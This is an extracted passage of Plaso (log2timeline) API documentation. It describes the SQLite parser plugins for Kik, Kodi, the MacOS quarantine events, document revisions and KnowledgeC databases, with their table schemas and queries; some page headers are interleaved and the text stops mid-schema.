SCHEMAS = [{'Z_3MESSAGES': 'CREATE TABLE Z_3MESSAGES ( Z_3CHAT INTEGER, Z_5MESSAGES INTEGER, PRIMARY KEY (Z_3CHAT, Z_5MESSAGES) )', 'Z_6ADMINSINVERSE': 'CREATE TABLE Z_6ADMINSINVERSE ( Z_6ADMINS INTEGER, Z_6ADMINSINVERSE INTEGER, PRIMARY KEY (Z_6ADMINS, Z_6ADMINSINVERSE) )', 'Z_6BANSINVERSE': 'CREATE TABLE Z_6BANSINVERSE ( Z_6BANS INTEGER, Z_6BANSINVERSE INTEGER, PRIMARY KEY (Z_6BANS, Z_6BANSINVERSE) )', 'Z_6MEMBERS': 'CREATE TABLE Z_6MEMBERS ( Z_6MEMBERSINVERSE INTEGER, Z_6MEMBERS INTEGER, PRIMARY KEY (Z_6MEMBERSINVERSE, Z_6MEMBERS) )', 'Z_METADATA': 'CREATE TABLE Z_METADATA (Z_VERSION INTEGER PRIMARY KEY, Z_UUID VARCHAR(255), Z_PLIST BLOB)', 'Z_PRIMARYKEY': 'CREATE TABLE Z_PRIMARYKEY (Z_ENT INTEGER PRIMARY KEY, Z_NAME VARCHAR, Z_SUPER INTEGER, Z_MAX INTEGER)', 'ZKIKATTACHMENT': 'CREATE TABLE ZKIKATTACHMENT ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZFLAGS INTEGER, ZINTERNALID INTEGER, ZRETRYCOUNT INTEGER, ZSTATE INTEGER, ZTYPE INTEGER, ZEXTRA INTEGER, ZMESSAGE INTEGER, ZLASTACCESSTIMESTAMP TIMESTAMP, ZTIMESTAMP TIMESTAMP, ZCONTENT VARCHAR )', 'ZKIKATTACHMENTEXTRA': 'CREATE TABLE ZKIKATTACHMENTEXTRA ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZATTACHMENT INTEGER, ZENCRYPTIONKEY BLOB )', 'ZKIKCHAT': 'CREATE TABLE ZKIKCHAT ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZFLAGS INTEGER, ZDRAFTMESSAGE INTEGER, ZEXTRA INTEGER, ZLASTMESSAGE INTEGER, ZUSER INTEGER, ZDATEUPDATED TIMESTAMP )', 'ZKIKCHATEXTRA': 'CREATE TABLE ZKIKCHATEXTRA ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZCHAT INTEGER, ZLASTSEENMESSAGE INTEGER, ZMUTEDTIMESTAMP TIMESTAMP )', 'ZKIKMESSAGE': 'CREATE TABLE ZKIKMESSAGE ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZFLAGS INTEGER, ZINTERNALID INTEGER, ZSTATE INTEGER, ZSYSTEMSTATE INTEGER, ZTYPE INTEGER, ZCHATEXTRA INTEGER, ZDRAFTMESSAGECHAT INTEGER, ZLASTMESSAGECHAT INTEGER, ZLASTMESSAGEUSER INTEGER, ZUSER INTEGER, ZRECEIVEDTIMESTAMP TIMESTAMP, ZTIMESTAMP TIMESTAMP, ZBODY VARCHAR, ZSTANZAID VARCHAR, ZRENDERINSTRUCTIONSET BLOB )', 'ZKIKUSER': 'CREATE TABLE ZKIKUSER ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZADDRESSBOOKID INTEGER, ZFLAGS INTEGER, ZINTERNALID INTEGER, ZPRESENCE INTEGER, ZTYPE INTEGER, ZCHATUSER INTEGER, ZEXTRA INTEGER, ZLASTMESSAGE INTEGER, ZDISPLAYNAME VARCHAR, ZDISPLAYNAMEASCII VARCHAR, ZEMAIL VARCHAR, ZFIRSTNAME VARCHAR, ZGROUPTAG VARCHAR, ZJID VARCHAR, ZLASTNAME VARCHAR, ZPPTIMESTAMP VARCHAR, ZPPURL VARCHAR, ZSTATUS VARCHAR, ZUSERNAME VARCHAR, ZCONTENTLINKSPROTODATA BLOB )', 'ZKIKUSEREXTRA': 'CREATE TABLE ZKIKUSEREXTRA ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZLOCALFLAGS INTEGER, ZUSER INTEGER, ZPUBLICMESSAGINGKEY BLOB )'}] plaso.parsers.sqlite_plugins.kodi module

SQLite parser plugin for Kodi videos database files. class plaso.parsers.sqlite_plugins.kodi.KodiMyVideosPlugin Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin SQLite parser plugin for Kodi videos database files. The Kodi videos database file is typically stored in: MyVideos.db DATA_FORMAT = 'Kodi videos SQLite database (MyVideos.db) file' NAME = 'kodi' ParseVideoRow(parser_mediator, query, row, **unused_kwargs) Parses a Video row. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.

278 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

• query (str) – query that created the row. • row (sqlite3.Row) – row. QUERIES = [('SELECT idFile, strFilename, playCount, lastPlayed FROM files', 'ParseVideoRow')] REQUIRED_STRUCTURE = {'files': frozenset({'idFile', 'lastPlayed', 'playCount', 'strFilename'})}

5.1. Subpackages 279 Plaso (log2timeline), Release 20210606

SCHEMAS = [{'actor': 'CREATE TABLE actor ( actor_id INTEGER PRIMARY KEY, name TEXT, art_urls TEXT )', 'actor_link': 'CREATE TABLE actor_link(actor_id INTEGER, media_id INTEGER, media_type TEXT, role TEXT, cast_order INTEGER)', 'art': 'CREATE TABLE art(art_id INTEGER PRIMARY KEY, media_id INTEGER, media_type TEXT, type TEXT, url TEXT)', 'bookmark': 'CREATE TABLE bookmark ( idBookmark integer primary key, idFile integer, timeInSeconds double, totalTimeInSeconds double, thumbNailImage text, player text, playerState text, type integer)', 'country': 'CREATE TABLE country ( country_id integer primary key, name TEXT)', 'country_link': 'CREATE TABLE country_link (country_id integer, media_id integer, media_type TEXT)', 'director_link': 'CREATE TABLE director_link(actor_id INTEGER, media_id INTEGER, media_type TEXT)', 'episode': 'CREATE TABLE episode ( idEpisode integer primary key, idFile integer,c00 text,c01 text,c02 text,c03 text,c04 text,c05 text,c06 text,c07 text,c08 text,c09 text,c10 text,c11 text,c12 varchar(24),c13 varchar(24),c14 text,c15 text,c16 text,c17 varchar(24),c18 text,c19 text,c20 text,c21 text,c22 text,c23 text, idShow integer, userrating integer, idSeason integer)', 'files': 'CREATE TABLE files ( idFile integer primary key, idPath integer, strFilename text, playCount integer, lastPlayed text, dateAdded text)', 'genre': 'CREATE TABLE genre ( genre_id integer primary key, name TEXT)', 'genre_link': 'CREATE TABLE genre_link (genre_id integer, media_id integer, media_type TEXT)', 'movie': 'CREATE TABLE movie ( idMovie integer primary key, idFile integer,c00 text,c01 text,c02 text,c03 text,c04 text,c05 text,c06 text,c07 text,c08 text,c09 text,c10 text,c11 text,c12 text,c13 text,c14 text,c15 text,c16 text,c17 text,c18 text,c19 text,c20 text,c21 text,c22 text,c23 text, idSet integer, userrating integer, premiered text)', 'movielinktvshow': 'CREATE TABLE movielinktvshow ( idMovie integer, IdShow integer)', 'musicvideo': 'CREATE TABLE musicvideo ( idMVideo integer primary key, idFile integer,c00 text,c01 text,c02 text,c03 text,c04 text,c05 text,c06 text,c07 text,c08 text,c09 text,c10 text,c11 text,c12 text,c13 text,c14 text,c15 text,c16 text,c17 text,c18 text,c19 text,c20 text,c21 text,c22 text,c23 text, userrating integer, premiered text)', 'path': 'CREATE TABLE path ( idPath integer primary key, strPath text, strContent text, strScraper text, strHash text, scanRecursive integer, useFolderNames bool, strSettings text, noUpdate bool, exclude bool, dateAdded text, idParentPath integer)', 'rating': 'CREATE TABLE rating (rating_id INTEGER PRIMARY KEY, media_id INTEGER, media_type TEXT, rating_type TEXT, rating FLOAT, votes INTEGER)', 'seasons': 'CREATE TABLE seasons ( idSeason integer primary key, idShow integer, season integer, name text, userrating integer)', 'sets': 'CREATE TABLE sets ( idSet integer primary key, strSet text, strOverview text)', 'settings': 'CREATE TABLE settings ( idFile integer, Deinterlace bool,ViewMode integer,ZoomAmount float, PixelRatio float, VerticalShift float, AudioStream integer, SubtitleStream integer,SubtitleDelay float, SubtitlesOn bool, Brightness float, Contrast float, Gamma float,VolumeAmplification float, AudioDelay float, OutputToAllSpeakers bool, ResumeTime integer,Sharpness float, NoiseReduction float, NonLinStretch bool, PostProcess bool,ScalingMethod integer, DeinterlaceMode integer, StereoMode integer, StereoInvert bool, VideoStream integer)', 'stacktimes': 'CREATE TABLE stacktimes (idFile integer, times text)', 'streamdetails': 'CREATE TABLE streamdetails (idFile integer, iStreamType integer, strVideoCodec text, fVideoAspect float, iVideoWidth integer, iVideoHeight integer, strAudioCodec text, iAudioChannels integer, strAudioLanguage text, strSubtitleLanguage text, iVideoDuration integer, strStereoMode text, strVideoLanguage text)', 'studio': 'CREATE TABLE studio ( studio_id integer primary key, name TEXT)', 'studio_link': 'CREATE TABLE studio_link (studio_id integer, media_id integer, media_type TEXT)', 'tag': 'CREATE TABLE tag (tag_id integer primary key, name TEXT)', 'tag_link': 'CREATE TABLE tag_link (tag_id integer, media_id integer, media_type TEXT)', 'tvshow': 'CREATE TABLE tvshow ( idShow integer primary key,c00 text,c01 text,c02 text,c03 text,c04 text,c05 text,c06 text,c07 text,c08 text,c09 text,c10 text,c11 text,c12 text,c13 text,c14 text,c15 text,c16 text,c17 text,c18 text,c19 text,c20 text,c21 text,c22 280 text,c23 text, userrating integer, duration INTEGER)', 'tvshowlinkpathChapter 5.': plaso'CREATE package TABLE tvshowlinkpath (idShow integer, idPath integer)', 'uniqueid': 'CREATE TABLE uniqueid (uniqueid_id INTEGER PRIMARY KEY, media_id INTEGER, media_type TEXT, value TEXT, type TEXT)', 'version': 'CREATE TABLE version (idVersion integer, iCompressCount integer)', 'writer_link': 'CREATE TABLE writer_link(actor_id INTEGER, media_id INTEGER, media_type TEXT)'}] Plaso (log2timeline), Release 20210606 class plaso.parsers.sqlite_plugins.kodi.KodiVideoEventData Bases: plaso.containers.events.EventData Kodi video event data. filename video filename. Type str play_count number of times the video has been played. Type int query SQL query that was used to obtain the event data. Type str DATA_TYPE = 'kodi:videos:viewing' plaso.parsers.sqlite_plugins.ls_quarantine module

SQLite parser plugin for MacOS LS quarantine events database files. class plaso.parsers.sqlite_plugins.ls_quarantine.LsQuarantineEventData Bases: plaso.containers.events.EventData MacOS launch services quarantine event data. agent user agent that was used to download the file. Type str data data. Type bytes query SQL query that was used to obtain the event data. Type str url original URL of the file. Type str DATA_TYPE = 'macosx:lsquarantine' class plaso.parsers.sqlite_plugins.ls_quarantine.LsQuarantinePlugin Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin SQLite parser plugin for MacOS LS quarantine events database files. The MacOS launch services (LS) quarantine database file is typically stored in: /Users//Library/Preferences/ QuarantineEvents.com.apple.LaunchServices DATA_FORMAT = 'MacOS launch services quarantine events database SQLite database file'

5.1. Subpackages 281 Plaso (log2timeline), Release 20210606

NAME = 'ls_quarantine' ParseLSQuarantineRow(parser_mediator, query, row, **unused_kwargs) Parses a launch services quarantine event row. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row. QUERIES = [('SELECT LSQuarantineTimeStamp AS Time, LSQuarantineAgentName AS Agent, LSQuarantineOriginURLString AS URL, LSQuarantineDataURLString AS Data FROM LSQuarantineEvent ORDER BY Time', 'ParseLSQuarantineRow')] REQUIRED_STRUCTURE = {'LSQuarantineEvent': frozenset({'LSQuarantineAgentName', 'LSQuarantineDataURLString', 'LSQuarantineOriginURLString', 'LSQuarantineTimeStamp'})} SCHEMAS = [{'LSQuarantineEvent': 'CREATE TABLE LSQuarantineEvent ( LSQuarantineEventIdentifier TEXT PRIMARY KEY NOT NULL, LSQuarantineTimeStamp REAL, LSQuarantineAgentBundleIdentifier TEXT, LSQuarantineAgentName TEXT, LSQuarantineDataURLString TEXT, LSQuarantineSenderName TEXT, LSQuarantineSenderAddress TEXT, LSQuarantineTypeNumber INTEGER, LSQuarantineOriginTitle TEXT, LSQuarantineOriginURLString TEXT, LSQuarantineOriginAlias BLOB )'}] plaso.parsers.sqlite_plugins.mac_document_versions module

SQLite parser plugin for MacOS document revision database files. class plaso.parsers.sqlite_plugins.mac_document_versions.MacDocumentVersionsEventData Bases: plaso.containers.events.EventData MacOS document revision event data. last_time the system user ID of the user that opened the file. Type str name name of the original file. Type str path path from the original file. Type str query SQL query that was used to obtain the event data. Type str user_sid identification user ID that open the file. Type str

282 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

version_path path to the version copy of the original file. Type str DATA_TYPE = 'mac:document_versions:file' class plaso.parsers.sqlite_plugins.mac_document_versions.MacDocumentVersionsPlugin Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin SQLite parser plugin for MacOS document revision database files. DATA_FORMAT = 'MacOS document revisions SQLite database file' DocumentVersionsRow(parser_mediator, query, row, **unused_kwargs) Parses a document versions row. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row. NAME = 'mac_document_versions' QUERIES = [('SELECT f.file_name AS name, f.file_path AS path, f.file_last_seen AS last_time, g.generation_path AS version_path, g.generation_add_time AS version_time FROM files f, generations g WHERE f.file_storage_id = g.generation_storage_id;', 'DocumentVersionsRow')] REQUIRED_STRUCTURE = {'files': frozenset({'file_last_seen', 'file_name', 'file_path', 'file_storage_id'}), 'generations': frozenset({'generation_add_time', 'generation_path', 'generation_storage_id'})} ROOT_VERSION_PATH = '/.DocumentRevisions-V100/' SCHEMAS = [{'files': 'CREATE TABLE files (file_row_id INTEGER PRIMARY KEY ASC, file_name TEXT, file_parent_id INTEGER, file_path TEXT, file_inode INTEGER, file_last_seen INTEGER NOT NULL DEFAULT 0, file_status INTEGER NOT NULL DEFAULT 1, file_storage_id INTEGER NOT NULL)', 'generations': 'CREATE TABLE generations (generation_id INTEGER PRIMARY KEY ASC, generation_storage_id INTEGER NOT NULL, generation_name TEXT NOT NULL, generation_client_id TEXT NOT NULL, generation_path TEXT UNIQUE, generation_options INTEGER NOT NULL DEFAULT 1, generation_status INTEGER NOT NULL DEFAULT 1, generation_add_time INTEGER NOT NULL DEFAULT 0, generation_size INTEGER NOT NULL DEFAULT 0, generation_prunable INTEGER NOT NULL DEFAULT 0)', 'storage': 'CREATE TABLE storage (storage_id INTEGER PRIMARY KEY ASC AUTOINCREMENT, storage_options INTEGER NOT NULL DEFAULT 1, storage_status INTEGER NOT NULL DEFAULT 1)'}]

5.1. Subpackages 283 Plaso (log2timeline), Release 20210606 plaso.parsers.sqlite_plugins.mac_knowledgec module

SQLite parser plugin for MacOS Duet/KnowledgeC database files. class plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCApplicationEventData Bases: plaso.containers.events.EventData KnowledgeC application execution event data. bundle_identifier bundle identifier of the application. Type str duration duration of the activity. Type int DATA_TYPE = 'mac:knowledgec:application' class plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCPlugin Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin SQLite parser plugin for MacOS Duet/KnowledgeC database files. DATA_FORMAT = 'MacOS Duet / KnowledgeC SQLites database file' KnowledgeCRow(parser_mediator, query, row, **unused_kwargs) Parses KnowledgeC application activity Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row. NAME = 'mac_knowledgec' QUERIES = [('\n SELECT\n ZOBJECT.ZCREATIONDATE AS "entry_creation", \n ZOBJECT.ZSTARTDATE AS "start", \n ZOBJECT.ZENDDATE AS "end",\n ZOBJECT.ZSTREAMNAME AS "action",\n ZOBJECT.ZVALUESTRING AS "zvaluestring",\n ZSTRUCTUREDMETADATA.Z_DKSAFARIHISTORYMETADATAKEY__TITLE AS "title"\n FROM ZOBJECT\n LEFT JOIN ZSTRUCTUREDMETADATA \n ON ZOBJECT.ZSTRUCTUREDMETADATA = ZSTRUCTUREDMETADATA.Z_PK\n ', 'KnowledgeCRow')] REQUIRED_STRUCTURE = {'ZOBJECT': frozenset({'ZCREATIONDATE', 'ZENDDATE', 'ZSTARTDATE', 'ZSTREAMNAME', 'ZVALUESTRING'}), 'ZSTRUCTUREDMETADATA': frozenset({'Z_DKSAFARIHISTORYMETADATAKEY__TITLE'})}

284 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

SCHEMAS = [{'ACHANGE': 'CREATE TABLE ACHANGE ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZCHANGETYPE INTEGER, ZENTITY INTEGER, ZENTITYPK INTEGER, ZTRANSACTIONID INTEGER, ZCOLUMNS BLOB, ZTOMBSTONE0 BLOB, ZTOMBSTONE1 BLOB, ZTOMBSTONE2 BLOB )', 'ATRANSACTION': 'CREATE TABLE ATRANSACTION ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZTIMESTAMP FLOAT, ZAUTHOR VARCHAR, ZBUNDLEID VARCHAR, ZCONTEXTNAME VARCHAR, ZPROCESSID VARCHAR, ZQUERYGEN BLOB )', 'ZADDITIONCHANGESET': 'CREATE TABLE ZADDITIONCHANGESET ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZSEQUENCENUMBER INTEGER, ZVERSION INTEGER, ZENDDATE TIMESTAMP, ZSTARTDATE TIMESTAMP, ZCKFOREIGNKEY VARCHAR, ZCKRECORDID VARCHAR, ZDEVICEIDENTIFIER VARCHAR, ZCHANGESET BLOB, ZCKRECORDSYSTEMFIELDS BLOB )', 'ZCONTEXTUALCHANGEREGISTRATION': 'CREATE TABLE ZCONTEXTUALCHANGEREGISTRATION ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZCREATIONDATE TIMESTAMP, ZIDENTIFIER VARCHAR, ZPROPERTIES BLOB )', 'ZCONTEXTUALKEYPATH': 'CREATE TABLE ZCONTEXTUALKEYPATH ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZDEVICEID INTEGER, ZISEPHEMERAL INTEGER, ZISUSERCENTRIC INTEGER, ZCREATIONDATE TIMESTAMP, ZLASTMODIFIEDDATE TIMESTAMP, ZKEY VARCHAR, ZVALUE BLOB )', 'ZCUSTOMMETADATA': 'CREATE TABLE ZCUSTOMMETADATA ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZINTEGERVALUE INTEGER, ZOBJECT INTEGER, Z8_OBJECT INTEGER, ZDATEVALUE TIMESTAMP, ZDOUBLEVALUE FLOAT, ZNAME VARCHAR, ZSTRINGVALUE VARCHAR, ZVALUEHASH VARCHAR, ZBINARYVALUE BLOB )', 'ZDELETIONCHANGESET': 'CREATE TABLE ZDELETIONCHANGESET ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZSEQUENCENUMBER INTEGER, ZVERSION INTEGER, ZENDDATE TIMESTAMP, ZSTARTDATE TIMESTAMP, ZCKFOREIGNKEY VARCHAR, ZCKRECORDID VARCHAR, ZDEVICEIDENTIFIER VARCHAR, ZCHANGESET BLOB, ZCKRECORDSYSTEMFIELDS BLOB )', 'ZHISTOGRAM': 'CREATE TABLE ZHISTOGRAM ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZSTREAMTYPECODE INTEGER, ZENDDATE TIMESTAMP, ZSTARTDATE TIMESTAMP, ZDEVICEIDENTIFIER VARCHAR, ZIDENTIFIER VARCHAR, ZSTREAMNAME VARCHAR )', 'ZHISTOGRAMVALUE': 'CREATE TABLE ZHISTOGRAMVALUE ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZCOUNT INTEGER, ZINTEGERVALUE INTEGER, ZHISTOGRAM INTEGER, ZSTRINGVALUE VARCHAR )', 'ZOBJECT': 'CREATE TABLE ZOBJECT ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZUUIDHASH INTEGER, ZEVENT INTEGER, ZSOURCE INTEGER, ZCATEGORYTYPE INTEGER, ZINTEGERVALUE INTEGER, ZENDDAYOFWEEK INTEGER, ZENDSECONDOFDAY INTEGER, ZHASCUSTOMMETADATA INTEGER, ZHASSTRUCTUREDMETADATA INTEGER, ZSECONDSFROMGMT INTEGER, ZSHOULDSYNC INTEGER, ZSTARTDAYOFWEEK INTEGER, ZSTARTSECONDOFDAY INTEGER, ZVALUECLASS INTEGER, ZVALUEINTEGER INTEGER, ZVALUETYPECODE INTEGER, ZSTRUCTUREDMETADATA INTEGER, ZVALUE INTEGER, Z8_VALUE INTEGER, ZIDENTIFIERTYPE INTEGER, ZQUANTITYTYPE INTEGER, ZOBJECT INTEGER, Z8_OBJECT INTEGER, ZSUBJECT INTEGER, Z8_SUBJECT INTEGER, ZCREATIONDATE TIMESTAMP, ZCONFIDENCE FLOAT, ZENDDATE TIMESTAMP, ZSTARTDATE TIMESTAMP, ZVALUEDOUBLE FLOAT, ZDOUBLEVALUE FLOAT, ZUUID VARCHAR, ZSTREAMNAME VARCHAR, ZVALUESTRING VARCHAR, ZSTRING VARCHAR, ZVERBPHRASE VARCHAR, ZMETADATA BLOB )', 'ZSOURCE': 'CREATE TABLE ZSOURCE ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZUSERID INTEGER, ZBUNDLEID VARCHAR, ZDEVICEID VARCHAR, ZGROUPID VARCHAR, ZITEMID VARCHAR, ZSOURCEID VARCHAR )', 'ZSTRUCTUREDMETADATA': 'CREATE TABLE ZSTRUCTUREDMETADATA ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, Z_CDPORTRAITMETADATAKEY__ALGORITHM INTEGER, Z_CDPORTRAITMETADATAKEY__ASSETVERSION INTEGER, Z_DKAPPINSTALLMETADATAKEY__ISINSTALL INTEGER, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ISPUBLICLYINDEXABLE INTEGER, Z_DKAPPLICATIONMETADATAKEY__PROCESSIDENTIFIER INTEGER, Z_DKAUDIOMETADATAKEY__ROUTECHANGEREASON INTEGER, Z_DKBLUETOOTHMETADATAKEY__DEVICETYPE INTEGER, Z_DKBULLETINBOARDMETADATAKEY__HASDATE INTEGER, Z_DKGLANCELAUNCHMETADATA__DEVICEIDENTIFIER INTEGER, Z_DKINTENTMETADATAKEY__DONATEDBYSIRI INTEGER, Z_DKINTENTMETADATAKEY__INTENTHANDLINGSTATUS INTEGER, Z_DKNOWPLAYINGMETADATAKEY__IDENTIFIER INTEGER, Z_DKNOWPLAYINGMETADATAKEY__PLAYING INTEGER, Z_DKSEARCHFEEDBACKMETADATAKEY__INTERACTIONTYPE INTEGER, Z_DKSEARCHFEEDBACKMETADATAKEY__SUGGESTIONTYPE INTEGER, 5.1. SubpackagesZ_DKSUNRISESUNSETMETADATAKEY__ISDAYLIGHT INTEGER, 285 Z_QPMETRICSMETADATAKEY__QUERYENGAGED INTEGER, Z_QPMETRICSMETADATAKEY__RESULTENGAGED INTEGER, ZCOM_APPLE_CALENDARUIKIT_USERACTIVITY_DATE INTEGER, ZCOM_APPLE_CALENDARUIKIT_USERACTIVITY_ENDDATE INTEGER, Z_CDPORTRAITMETADATAKEY__DECAYRATE FLOAT, Z_CDPORTRAITMETADATAKEY__SCORE FLOAT, Z_DKAPPLICATIONACTIVITYMETADATAKEY__EXPIRATIONDATE TIMESTAMP, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__LATITUDE FLOAT, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__LONGITUDE FLOAT, Z_DKLOCATIONMETADATAKEY__LATITUDE FLOAT, Z_DKLOCATIONMETADATAKEY__LONGITUDE FLOAT, Z_DKNOWPLAYINGMETADATAKEY__DURATION FLOAT, Z_DKNOWPLAYINGMETADATAKEY__ELAPSED FLOAT, Z_DKPERIODMETADATAKEY__PERIODEND TIMESTAMP, Z_DKPERIODMETADATAKEY__PERIODSTART TIMESTAMP, Z_DKSUNRISESUNSETMETADATAKEY__CURRENTSUNRISE TIMESTAMP, Z_DKSUNRISESUNSETMETADATAKEY__CURRENTSUNSET TIMESTAMP, Z_DKSUNRISESUNSETMETADATAKEY__NEXTSUNRISE TIMESTAMP, Z_DKSUNRISESUNSETMETADATAKEY__NEXTSUNSET TIMESTAMP, Z_DKSUNRISESUNSETMETADATAKEY__PREVIOUSSUNRISE TIMESTAMP, Z_DKSUNRISESUNSETMETADATAKEY__PREVIOUSSUNSET TIMESTAMP, Z_QPMETRICSMETADATAKEY__TIMESTAMP FLOAT, Z_CDENTITYMETADATAKEY__BESTLANGUAGE VARCHAR, Z_CDENTITYMETADATAKEY__NAME VARCHAR, Z_CDPORTRAITMETADATAKEY__OSBUILD VARCHAR, Z_DKAPPINSTALLMETADATAKEY__PRIMARYCATEGORY VARCHAR, Z_DKAPPINSTALLMETADATAKEY__TITLE VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ACTIVITYTYPE VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ITEMIDENTIFIER VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ITEMRELATEDUNIQUEIDENTIFIER VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__TITLE VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__USERACTIVITYREQUIREDSTRING VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__USERACTIVITYUUID VARCHAR, Z_DKAPPLICATIONMETADATAKEY__BACKBOARDSTATE VARCHAR, Z_DKAPPLICATIONMETADATAKEY__EXTENSIONCONTAININGBUNDLEIDENTIFIER VARCHAR, Z_DKAPPLICATIONMETADATAKEY__EXTENSIONHOSTIDENTIFIER VARCHAR, Z_DKAPPLICATIONMETADATAKEY__LAUNCHREASON VARCHAR, Z_DKAUDIOMETADATAKEY__CHANNELS VARCHAR, Z_DKAUDIOMETADATAKEY__DATASOURCES VARCHAR, Z_DKAUDIOMETADATAKEY__IDENTIFIER VARCHAR, Z_DKAUDIOMETADATAKEY__PORTNAME VARCHAR, Z_DKAUDIOMETADATAKEY__PORTTYPE VARCHAR, Z_DKAUDIOMETADATAKEY__PREFERREDDATASOURCE VARCHAR, Z_DKAUDIOMETADATAKEY__SELECTEDDATASOURCE VARCHAR, Z_DKBATTERYSAVERMETADATAKEY__SOURCE VARCHAR, Z_DKBLUETOOTHMETADATAKEY__ADDRESS VARCHAR, Z_DKBLUETOOTHMETADATAKEY__NAME VARCHAR, Z_DKBULLETINBOARDMETADATAKEY__FEED VARCHAR, Z_DKBULLETINBOARDMETADATAKEY__MESSAGE VARCHAR, Z_DKBULLETINBOARDMETADATAKEY__SUBTITLE VARCHAR, Z_DKBULLETINBOARDMETADATAKEY__TITLE VARCHAR, Z_DKCALENDARMETADATAKEY__INTERACTION VARCHAR, Z_DKCALLMETADATAKEY__INTERACTION VARCHAR, Z_DKDEVICEIDMETADATAKEY__DEVICEIDENTIFIER VARCHAR, Z_DKINTENTMETADATAKEY__INTENTCLASS VARCHAR, Z_DKINTENTMETADATAKEY__INTENTVERB VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__URL VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__CITY VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__COUNTRY VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__DISPLAYNAME VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__FULLYFORMATTEDADDRESS VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__LOCATIONNAME VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__POSTALCODE_V2 VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__STATEORPROVINCE VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__SUBTHOROUGHFARE VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__THOROUGHFARE VARCHAR, Z_DKLOCATIONMETADATAKEY__IDENTIFIER VARCHAR, Z_DKMETADATAHOMEAPPVIEW__HOMEUUID VARCHAR, Z_DKMETADATAHOMEAPPVIEW__VIEWINFORMATION VARCHAR, Z_DKMETADATAHOMEAPPVIEW__VIEWNAME VARCHAR, Z_DKMETADATAHOMEAPPVIEW__VIEWUUID VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__ACCESSORYNAME VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__ACCESSORYUUID VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__CHARACTERISTICTYPE VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__CLIENTNAME VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__HOMEUUID VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__SERVICENAME VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__SERVICETYPE VARCHAR, Z_DKMETADATAHOMEKITSCENE__ACTIONSETNAME VARCHAR, Z_DKMETADATAHOMEKITSCENE__ACTIONSETTYPE VARCHAR, Z_DKMETADATAHOMEKITSCENE__ACTIONSETUUID VARCHAR, Z_DKMETADATAHOMEKITSCENE__CLIENTNAME VARCHAR, Z_DKMETADATAHOMEKITSCENE__HOMEUUID VARCHAR, 